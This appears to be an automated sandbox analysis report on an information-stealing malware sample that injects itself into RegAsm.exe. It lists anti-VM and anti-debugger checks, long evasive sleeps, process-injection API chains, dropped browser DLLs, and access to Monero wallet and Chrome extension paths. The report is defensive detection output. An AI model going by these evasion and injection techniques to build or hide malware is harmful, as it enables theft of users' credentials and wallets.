Source: C:\Users\userBAAAAKJKJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAAAAKJKJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAAAAKJKJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAAAAKJKJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAAAAKJKJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userBAAAAKJKJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAFIDGDBGCA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 10.2.KJEGDBKFIJ.exe.3435570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.37e5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.37e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1666233856.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2585998316.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2337029963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2293601659.000000000346E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1700, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RegAsm.exe Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 0000001B.00000002.2585998316.000000000043A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000002.00000002.2337029963.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\file.exe Memory allocated: D50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 27E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: 2700000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory allocated: 1250000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory allocated: 2CF0000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory allocated: 2AF0000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory allocated: 820000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory allocated: 2430000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory allocated: 2230000 memory reserve | memory write watch Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory allocated: 14C0000 memory reserve | memory write watch
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory allocated: 2F50000 memory reserve | memory write watch
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory allocated: 4F50000 memory reserve | memory write watch
Source: C:\Users\userBAAAAKJKJE.exe Memory allocated: 17D0000 memory reserve | memory write watch
Source: C:\Users\userBAAAAKJKJE.exe Memory allocated: 3230000 memory reserve | memory write watch
Source: C:\Users\userBAAAAKJKJE.exe Memory allocated: 5230000 memory reserve | memory write watch
Source: C:\Users\userAFIDGDBGCA.exe Memory allocated: AD0000 memory reserve | memory write watch
Source: C:\Users\userAFIDGDBGCA.exe Memory allocated: 2520000 memory reserve | memory write watch
Source: C:\Users\userAFIDGDBGCA.exe Memory allocated: 22C0000 memory reserve | memory write watch
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 2_2_0040180D
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\userBAAAAKJKJE.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\userAFIDGDBGCA.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\ProgramData\IIJKJDAFHJ.exe Window / User API: threadDelayed 384
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 9.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 4108 Thread sleep count: 294 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2872 Thread sleep count: 196 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6596 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe TID: 6260 Thread sleep count: 196 > 30 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe TID: 6260 Thread sleep count: 299 > 30 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe TID: 2256 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6484 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe TID: 5480 Thread sleep count: 295 > 30 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe TID: 5480 Thread sleep count: 203 > 30 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe TID: 2648 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe TID: 6688 Thread sleep count: 384 > 30
Source: C:\ProgramData\IIJKJDAFHJ.exe TID: 6688 Thread sleep count: 107 > 30
Source: C:\ProgramData\IIJKJDAFHJ.exe TID: 6676 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 3332 Thread sleep count: 67 > 30
Source: C:\Users\userBAAAAKJKJE.exe TID: 4992 Thread sleep count: 293 > 30
Source: C:\Users\userBAAAAKJKJE.exe TID: 4992 Thread sleep count: 195 > 30
Source: C:\Users\userBAAAAKJKJE.exe TID: 4884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\userAFIDGDBGCA.exe TID: 6128 Thread sleep count: 195 > 30
Source: C:\Users\userAFIDGDBGCA.exe TID: 6128 Thread sleep count: 298 > 30
Source: C:\Users\userAFIDGDBGCA.exe TID: 4164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5272 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh 2_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose, 2_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 2_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 2_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose, 2_2_0040CD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00410FBA GetSystemInfo,wsprintfA, 2_2_00410FBA
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\userBAAAAKJKJE.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\userAFIDGDBGCA.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.0000000001015000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2366798957.000000000104F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.000000000144A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2589447441.000000000117C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.2541287288.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.2541565506.00000000012DA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000111A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0\
Source: RegAsm.exe, 00000002.00000002.2340395451.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW7@
Source: RegAsm.exe, 0000000F.00000002.2763045880.00000000014AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
Source: RegAsm.exe, 0000001B.00000002.2589447441.000000000111A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: RegAsm.exe, 0000000C.00000002.2740659135.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00446170 LdrInitializeThunk, 9_2_00446170
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041D016
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00418950
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004014AD mov eax, dword ptr fs:[00000030h] 2_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040148A mov eax, dword ptr fs:[00000030h] 2_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004014A2 mov eax, dword ptr fs:[00000030h] 2_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00418599 mov eax, dword ptr fs:[00000030h] 2_2_00418599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041859A mov eax, dword ptr fs:[00000030h] 2_2_0041859A
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA, 2_2_0040884C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042762E SetUnhandledExceptionFilter, 2_2_0042762E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C13B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6C13B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C13B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C13B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C2EAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6C2EAC62
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 6284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IIJKJDAFHJ.exe PID: 7152, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6724, type: MEMORYSTR
.NET source code references suspicious native API functions
Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\ProgramData\GDBFCGIIIJ.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\ProgramData\KJEGDBKFIJ.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\ProgramData\IIJKJDAFHJ.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userBAAAAKJKJE.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\userAFIDGDBGCA.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_027E212D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 0_2_027E212D
Injects a PE file into a foreign processes
